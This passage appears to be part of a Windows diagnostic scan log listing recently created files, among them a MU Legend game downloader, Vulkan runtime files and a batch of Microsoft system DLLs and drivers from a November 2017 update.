2017-11-19 01:28 - 2017-11-19 01:28 - 000000830 ___HC C:\Users\Jpoch\Desktop\MU_LEGEND.lnk
2017-11-19 01:28 - 2017-11-19 01:28 - 000000000 ____D C:\Users\Jpoch\AppData\Local\VCLStylesSkin
2017-11-19 01:12 - 2017-11-19 01:24 - 000000000 ___DC C:\download
2017-11-19 01:11 - 2017-11-19 01:11 - 000000000 ____D C:\ProgramData\WEBZEN
2017-11-19 01:08 - 2017-11-19 01:11 - 005929456 ____C C:\Users\Jpoch\Downloads\MU_LEGEND_Downloader1.exe
2017-11-18 13:54 - 2017-11-18 13:54 - 000000000 ____D C:\Program Files (x86)\VulkanRT
2017-11-18 13:54 - 2017-10-27 08:06 - 000136312 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvStreaming.exe
2017-11-18 13:54 - 2017-09-13 15:20 - 000798008 _____ C:\WINDOWS\SysWOW64\vulkan-1.dll
2017-11-18 13:54 - 2017-09-13 15:20 - 000490296 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe
2017-11-18 13:54 - 2017-09-13 15:19 - 000927544 _____ C:\WINDOWS\system32\vulkan-1.dll
2017-11-18 13:54 - 2017-09-13 15:19 - 000591160 _____ C:\WINDOWS\system32\vulkaninfo.exe
2017-11-18 13:53 - 2017-11-18 13:54 - 000000000 ____D C:\WINDOWS\LastGood.Tmp
2017-11-14 13:54 - 2017-11-01 21:16 - 002398696 ____C (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-11-14 13:54 - 2017-11-01 21:15 - 001239448 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2017-11-14 13:54 - 2017-11-01 21:13 - 000546712 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storport.sys
2017-11-14 13:54 - 2017-11-01 21:13 - 000095640 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\stornvme.sys
2017-11-14 13:54 - 2017-11-01 21:12 - 000654976 ____C (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2017-11-14 13:54 - 2017-11-01 21:12 - 000144248 ____C (Microsoft Corporation) C:\WINDOWS\system32\WerFaultSecure.exe
2017-11-14 13:54 - 2017-11-01 21:10 - 006557520 ____C (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2017-11-14 13:54 - 2017-11-01 21:05 - 000187800 ____C (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe
2017-11-14 13:54 - 2017-11-01 21:04 - 001292360 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll
2017-11-14 13:54 - 2017-11-01 21:03 - 000223640 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\aepic.dll
2017-11-14 13:54 - 2017-11-01 20:49 - 001838848 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-11-14 13:54 - 2017-11-01 20:45 - 000703056 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\winhttp.dll
2017-11-14 13:54 - 2017-11-01 20:45 - 000613136 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2017-11-14 13:54 - 2017-11-01 20:45 - 000362144 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\Faultrep.dll
2017-11-14 13:54 - 2017-11-01 20:45 - 000354360 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcryptprimitives.dll
2017-11-14 13:54 - 2017-11-01 20:45 - 000283544 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\WerFault.exe
2017-11-14 13:54 - 2017-11-01 20:45 - 000172952 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\wermgr.exe
2017-11-14 13:54 - 2017-11-01 20:45 - 000133896 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\WerFaultSecure.exe
2017-11-14 13:54 - 2017-11-01 20:44 - 023680000 ____C (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-11-14 13:54 - 2017-11-01 20:44 - 005808640 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2017-11-14 13:54 - 2017-11-01 20:44 - 000519680 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2017-11-14 13:54 - 2017-11-01 20:43 - 020372896 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-11-14 13:54 - 2017-11-01 20:36 - 000099328 ____C (Microsoft Corporation) C:\WINDOWS\system32\utcutil.dll
2017-11-14 13:54 - 2017-11-01 20:35 - 000228352 ____C (Microsoft Corporation) C:\WINDOWS\system32\VPNv2CSP.dll
2017-11-14 13:54 - 2017-11-01 20:35 - 000128512 ____C (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll
2017-11-14 13:54 - 2017-11-01 20:34 - 012803072 ____C (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-11-14 13:54 - 2017-11-01 20:34 - 000306176 ____C (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2017-11-14 13:54 - 2017-11-01 20:34 - 000168448 ____C (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe
2017-11-14 13:54 - 2017-11-01 20:34 - 000110592 ____C (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2017-11-14 13:54 - 2017-11-01 20:34 - 000095232 ____C (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
2017-11-14 13:54 - 2017-11-01 20:34 - 000033792 ____C (Microsoft Corporation) C:\WINDOWS\system32\wuautoappupdate.dll
2017-11-14 13:54 - 2017-11-01 20:32 - 008213504 ____C (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2017-11-14 13:54 - 2017-11-01 20:31 - 020512256 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-11-14 13:54 - 2017-11-01 20:30 - 013381120 ____C (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll
2017-11-14 13:54 - 2017-11-01 20:30 - 002953216 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-11-14 13:54 - 2017-11-01 20:30 - 000407040 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\werui.dll
2017-11-14 13:54 - 2017-11-01 20:30 - 000388096 ____C (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2017-11-14 13:54 - 2017-11-01 20:30 - 000225792 ____C (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2017-11-14 13:54 - 2017-11-01 20:30 - 000165888 ____C (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2017-11-14 13:54 - 2017-11-01 20:30 - 000155136 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWWIN.EXE
2017-11-14 13:54 - 2017-11-01 20:29 - 019338240 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-11-14 13:54 - 2017-11-01 20:29 - 000805888 ____C (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2017-11-14 13:54 - 2017-11-01 20:29 - 000752640 ____C (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2017-11-14 13:54 - 2017-11-01 20:29 - 000588800 ____C (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2017-11-14 13:54 - 2017-11-01 20:28 - 023684096 ____C (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-11-14 13:54 - 2017-11-01 20:28 - 000002560 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\tzres.dll
2017-11-14 13:54 - 2017-11-01 20:27 - 002078720 ____C (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2017-11-14 13:54 - 2017-11-01 20:27 - 000080896 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2017-11-14 13:54 - 2017-11-01 20:27 - 000079872 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll
2017-11-14 13:54 - 2017-11-01 20:27 - 000049152 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertPKICmdlet.dll
2017-11-14 13:54 - 2017-11-01 20:26 - 008197120 ____C (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-11-14 13:54 - 2017-11-01 20:26 - 005963776 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2017-11-14 13:54 - 2017-11-01 20:26 - 002671616 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2017-11-14 13:54 - 2017-11-01 20:26 - 001937408 ____C (Microsoft Corporation) C:\WINDOWS\system32\wpdshext.dll
2017-11-14 13:54 - 2017-11-01 20:26 - 000755712 ____C (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2017-11-14 13:54 - 2017-11-01 20:26 - 000371712 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2017-11-14 13:54 - 2017-11-01 20:26 - 000068608 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\OnDemandConnRouteHelper.dll
2017-11-14 13:54 - 2017-11-01 20:25 - 012227072 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll
2017-11-14 13:54 - 2017-11-01 20:25 - 011888128 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-11-14 13:54 - 2017-11-01 20:25 - 004727808 ____C (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-11-14 13:54 - 2017-11-01 20:25 - 003377664 ____C (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2017-11-14 13:54 - 2017-11-01 20:25 - 000370688 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\FirewallAPI.dll
2017-11-14 13:54 - 2017-11-01 20:25 - 000364544 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2017-11-14 13:54 - 2017-11-01 20:25 - 000339968 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2017-11-14 13:54 - 2017-11-01 20:24 - 007598080 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2017-11-14 13:54 - 2017-11-01 20:24 - 000506368 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-11-14 13:54 - 2017-11-01 20:24 - 000463872 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\efswrt.dll
2017-11-14 13:54 - 2017-11-01 20:24 - 000444928 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.Launcher.dll
2017-11-14 13:54 - 2017-11-01 20:24 - 000358400 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2017-11-14 13:54 - 2017-11-01 20:23 - 002516480 ____C (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2017-11-14 13:54 - 2017-11-01 20:23 - 000680960 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AccountsControl.dll
2017-11-14 13:54 - 2017-11-01 20:23 - 000664576 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2017-11-14 13:54 - 2017-11-01 20:23 - 000590336 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\PCPKsp.dll
2017-11-14 13:54 - 2017-11-01 20:23 - 000476160 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\dsreg.dll
2017-11-14 13:54 - 2017-11-01 20:22 - 006254080 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-11-14 13:54 - 2017-11-01 20:22 - 002859520 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-11-14 13:54 - 2017-11-01 20:22 - 002009600 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2017-11-14 13:54 - 2017-11-01 20:22 - 001884160 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpdshext.dll
2017-11-14 13:54 - 2017-11-01 20:22 - 001494528 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActiveSyncProvider.dll
2017-11-14 13:54 - 2017-11-01 20:21 - 004417024 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2017-11-14 13:54 - 2017-11-01 20:21 - 003653120 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-11-14 13:54 - 2017-11-01 20:21 - 000787456 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2017-11-14 13:54 - 2017-11-01 20:21 - 000658432 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2017-11-14 13:54 - 2017-10-24 23:40 - 000339968 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\msexcl40.dll
2017-11-14 13:54 - 2017-10-15 07:09 - 002259760 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-11-14 13:54 - 2017-10-15 07:03 - 006765728 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-11-14 13:54 - 2017-10-15 07:01 - 000583160 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2017-11-14 13:54 - 2017-10-15 06:53 - 002969880 ____C (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-11-14 13:54 - 2017-10-15 06:53 - 000387928 ____C (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll
2017-11-14 13:54 - 2017-10-15 06:49 - 000094616 ____C (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2017-11-14 13:54 - 2017-10-15 06:49 - 000025088 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\odbcconf.dll
2017-11-14 13:54 - 2017-10-15 06:46 - 004544000 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\VsGraphicsDesktopEngine.exe
2017-11-14 13:54 - 2017-10-15 06:45 - 001292288 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2017-11-14 13:54 - 2017-10-15 06:45 - 001248768 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-11-14 13:54 - 2017-10-15 06:44 - 000636416 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2017-11-14 13:54 - 2017-10-15 06:44 - 000050176 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\cldapi.dll
2017-11-14 13:54 - 2017-10-15 06:42 - 005225984 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2017-11-14 13:54 - 2017-10-15 06:42 - 003667456 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2017-11-14 13:54 - 2017-10-15 06:41 - 004559360 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2017-11-14 13:54 - 2017-10-15 06:41 - 001019904 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2017-11-14 13:54 - 2017-10-15 06:38 - 000089088 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2017-11-14 13:54 - 2017-10-15 06:14 - 000037376 ____C (Microsoft Corporation) C:\WINDOWS\system32\SEMgrPS.dll
2017-11-14 13:54 - 2017-10-15 06:10 - 001303040 ____C (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2017-11-14 13:53 - 2017-11-01 21:21 - 001578904 ____C (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2017-11-14 13:53 - 2017-11-01 21:21 - 000678808 ____C (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2017-11-14 13:53 - 2017-11-01 21:21 - 000612248 ____C (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2017-11-14 13:53 - 2017-11-01 21:21 - 000379288 ____C (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2017-11-14 13:53 - 2017-11-01 21:21 - 000190360 ____C (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2017-11-14 13:53 - 2017-11-01 21:21 - 000136088 ____C (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2017-11-14 13:53 - 2017-11-01 21:20 - 002032536 ____C (Microsoft Corporation) C:\WINDOWS\system32\aitstatic.exe
2017-11-14 13:53 - 2017-11-01 21:20 - 001144728 ____C (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-11-14 13:53 - 2017-11-01 21:20 - 001015704 ____C (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-11-14 13:53 - 2017-11-01 21:20 - 000965016 ____C (Microsoft Corporation) C:\WINDOWS\system32\hvloader.efi
2017-11-14 13:53 - 2017-11-01 21:20 - 000821656 ____C (Microsoft Corporation) C:\WINDOWS\system32\hvloader.exe
2017-11-14 13:53 - 2017-11-01 21:20 - 000613784 ____C (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2017-11-14 13:53 - 2017-11-01 21:20 - 000543640 ____C (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2017-11-14 13:53 - 2017-11-01 21:20 - 000484248 ____C (Microsoft Corporation) C:\WINDOWS\system32\dcntel.dll
2017-11-14 13:53 - 2017-11-01 21:20 - 000469568 ____C (Microsoft Corporation) C:\WINDOWS\system32\wow64win.dll
2017-11-14 13:53 - 2017-11-01 21:20 - 000259992 ____C (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2017-11-14 13:53 - 2017-11-01 21:20 - 000034712 ____C (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2017-11-14 13:53 - 2017-11-01 21:16 - 008319384 ____C (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-11-14 13:53 - 2017-11-01 21:16 - 002327448 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2017-11-14 13:53 - 2017-11-01 21:15 - 000503704 ____C (Microsoft Corporation) C:\WINDOWS\system32\pcasvc.dll
2017-11-14 13:53 - 2017-11-01 21:14 - 000667040 ____C (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2017-11-14 13:53 - 2017-11-01 21:14 - 000067992 ____C (Microsoft Corporation) C:\WINDOWS\system32\win32appinventorycsp.dll
2017-11-14 13:53 - 2017-11-01 21:13 - 005477088 ____C (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2017-11-14 13:53 - 2017-11-01 21:13 - 002443672 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-11-14 13:53 - 2017-11-01 21:13 - 001345600 ____C (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
2017-11-14 13:53 - 2017-11-01 21:13 - 000212888 ____C (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2017-11-14 13:53 - 2017-11-01 21:12 - 000727336 ____C (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2017-11-14 13:53 - 2017-11-01 21:12 - 000714648 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fvevol.sys
2017-11-14 13:53 - 2017-11-01 21:12 - 000643192 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2017-11-14 13:53 - 2017-11-01 21:12 - 000430848 ____C (Microsoft Corporation) C:\WINDOWS\system32\bcryptprimitives.dll
2017-11-14 13:53 - 2017-11-01 21:12 - 000412752 ____C (Microsoft Corporation) C:\WINDOWS\system32\Faultrep.dll
2017-11-14 13:53 - 2017-11-01 21:12 - 000319384 ____C (Microsoft Corporation) C:\WINDOWS\system32\WerFault.exe
2017-11-14 13:53 - 2017-11-01 21:12 - 000038808 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Diskdump.sys
2017-11-14 13:53 - 2017-11-01 21:12 - 000026472 ____C (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2017-11-14 13:53 - 2017-11-01 21:11 - 021353200 ____C (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-11-14 13:53 - 2017-11-01 21:05 - 000871408 ____C (Microsoft Corporation) C:\WINDOWS\system32\winhttp.dll
2017-11-14 13:53 - 2017-11-01 20:37 - 003668992 ____C (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-11-14 13:53 - 2017-11-01 20:37 - 001278976 ____C (Microsoft Corporation) C:\WINDOWS\system32\werconcpl.dll
2017-11-14 13:53 - 2017-11-01 20:37 - 000465920 ____C (Microsoft Corporation) C:\WINDOWS\system32\werui.dll
2017-11-14 13:53 - 2017-11-01 20:37 - 000184320 ____C (Microsoft Corporation) C:\WINDOWS\system32\DWWIN.EXE
2017-11-14 13:53 - 2017-11-01 20:37 - 000077824 ____C (Microsoft Corporation) C:\WINDOWS\system32\wsqmcons.exe
2017-11-14 13:53 - 2017-11-01 20:36 - 000098816 ____C (Microsoft Corporation) C:\WINDOWS\system32\wercplsupport.dll
2017-11-14 13:53 - 2017-11-01 20:35 - 000064000 ____C (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
2017-11-14 13:53 - 2017-11-01 20:35 - 000025600 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Dumpstorport.sys
2017-11-14 13:53 - 2017-11-01 20:35 - 000002560 ____C (Microsoft Corporation) C:\WINDOWS\system32\tzres.dll
2017-11-14 13:53 - 2017-11-01 20:34 - 000438784 ____C (Microsoft Corporation) C:\WINDOWS\system32\SharedPCCSP.dll
2017-11-14 13:53 - 2017-11-01 20:34 - 000138240 ____C (Microsoft Corporation) C:\WINDOWS\system32\DataUsageLiveTileTask.exe
2017-11-14 13:53 - 2017-11-01 20:34 - 000113152 ____C (Microsoft Corporation) C:\WINDOWS\system32\wuuhosdeployment.dll
2017-11-14 13:53 - 2017-11-01 20:33 - 000529408 ____C (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2017-11-14 13:53 - 2017-11-01 20:33 - 000324608 ____C (Microsoft Corporation) C:\WINDOWS\system32\DataUsageHandlers.dll
2017-11-14 13:53 - 2017-11-01 20:33 - 000090112 ____C (Microsoft Corporation) C:\WINDOWS\system32\OnDemandConnRouteHelper.dll
2017-11-14 13:53 - 2017-11-01 20:33 - 000064512 ____C (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-11-14 13:53 - 2017-11-01 20:33 - 000061440 ____C (Microsoft Corporation) C:\WINDOWS\system32\CertPKICmdlet.dll
2017-11-14 13:53 - 2017-11-01 20:32 - 000255488 ____C (Microsoft Corporation) C:\WINDOWS\system32\ubpm.dll
2017-11-14 13:53 - 2017-11-01 20:32 - 000125952 ____C (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Storage.dll
2017-11-14 13:53 - 2017-11-01 20:31 - 000434176 ____C (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll
2017-11-14 13:53 - 2017-11-01 20:31 - 000411648 ____C (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll
2017-11-14 13:53 - 2017-11-01 20:31 - 000153088 ____C (Microsoft Corporation) C:\WINDOWS\system32\RMapi.dll
2017-11-14 13:53 - 2017-11-01 20:30 - 007339008 ____C (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2017-11-14 13:53 - 2017-11-01 20:30 - 000719872 ____C (Microsoft Corporation) C:\WINDOWS\system32\FlightSettings.dll
2017-11-14 13:53 - 2017-11-01 20:30 - 000635392 ____C (Microsoft Corporation) C:\WINDOWS\system32\efswrt.dll
2017-11-14 13:53 - 2017-11-01 20:30 - 000601088 ____C (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.Launcher.dll
2017-11-14 13:53 - 2017-11-01 20:30 - 000229888 ____C (Microsoft Corporation) C:\WINDOWS\system32\SIHClient.exe
2017-11-14 13:53 - 2017-11-01 20:29 - 000757248 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys
2017-11-14 13:53 - 2017-11-01 20:29 - 000415232 ____C (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2017-11-14 13:53 - 2017-11-01 20:28 - 001468416 ____C (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-11-14 13:53 - 2017-11-01 20:28 - 000939008 ____C (Microsoft Corporation) C:\WINDOWS\system32\Windows.AccountsControl.dll
2017-11-14 13:53 - 2017-11-01 20:28 - 000799744 ____C (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll
2017-11-14 13:53 - 2017-11-01 20:28 - 000772096 ____C (Microsoft Corporation) C:\WINDOWS\system32\PCPKsp.dll
2017-11-14 13:53 - 2017-11-01 20:27 - 000565248 ____C (Microsoft Corporation) C:\WINDOWS\system32\dsreg.dll
2017-11-14 13:53 - 2017-11-01 20:27 - 000537600 ____C (Microsoft Corporation) C:\WINDOWS\system32\ipnathlp.dll
2017-11-14 13:53 - 2017-11-01 20:27 - 000179712 ____C (Microsoft Corporation) C:\WINDOWS\system32\wersvc.dll
2017-11-14 13:53 - 2017-11-01 20:26 - 004445696 ____C (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-11-14 13:53 - 2017-11-01 20:26 - 003060224 ____C (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll
2017-11-14 13:53 - 2017-11-01 20:26 - 002809344 ____C (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-11-14 13:53 - 2017-11-01 20:26 - 000986624 ____C (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2017-11-14 13:53 - 2017-11-01 20:25 - 003307008 ____C (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-11-14 13:53 - 2017-11-01 20:25 - 002052608 ____C (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-11-14 13:53 - 2017-11-01 20:25 - 001886208 ____C (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-11-14 13:53 - 2017-11-01 20:25 - 001713664 ____C (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncProvider.dll
2017-11-14 13:53 - 2017-11-01 20:25 - 000972288 ____C (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll
2017-11-14 13:53 - 2017-11-01 20:25 - 000877568 ____C (Microsoft Corporation) C:\WINDOWS\system32\schedsvc.dll
2017-11-14 13:53 - 2017-11-01 20:25 - 000684544 ____C (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-11-14 13:53 - 2017-11-01 20:24 - 004707840 ____C (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2017-11-14 13:53 - 2017-11-01 20:23 - 002449408 ____C (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-11-14 13:53 - 2017-11-01 20:23 - 000407040 ____C (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2017-11-14 13:53 - 2017-11-01 20:19 - 000124928 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\luafv.sys
2017-11-14 13:53 - 2017-10-15 06:59 - 000923040 ____C (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-11-14 13:53 - 2017-10-15 06:57 - 000712600 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2017-11-14 13:53 - 2017-10-15 06:57 - 000409496 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2017-11-14 13:53 - 2017-10-15 06:56 - 000872464 ____C (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2017-11-14 13:53 - 2017-10-15 06:55 - 007910960 ____C (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-11-14 13:53 - 2017-10-15 06:51 - 000584192 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll
2017-11-14 13:53 - 2017-10-15 06:15 - 000584192 ____C (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2017-11-14 13:53 - 2017-10-15 06:13 - 000029696 ____C (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll
2017-11-14 13:53 - 2017-10-15 06:09 - 001878016 ____C (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-11-14 13:53 - 2017-10-15 06:09 - 000527360 ____C (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-11-14 13:53 - 2017-10-15 06:08 - 001260544 ____C (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-11-14 13:53 - 2017-10-15 06:08 - 000056832 ____C (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll
2017-11-14 13:53 - 2017-10-15 06:07 - 005776384 ____C (Microsoft Corporation) C:\WINDOWS\system32\VsGraphicsDesktopEngine.exe
2017-11-14 13:53 - 2017-10-15 06:07 - 000925696 ____C (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2017-11-14 13:53 - 2017-10-15 06:05 - 004396032 ____C (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-11-14 13:53 - 2017-10-15 06:05 - 001293824 ____C (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-11-14 13:53 - 2017-10-15 06:04 - 005557760 ____C (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2017-11-14 13:53 - 2017-10-15 06:02 - 000079360 ____C (Microsoft Corporation) C:\WINDOWS\system32\LocationFrameworkInternalPS.dll
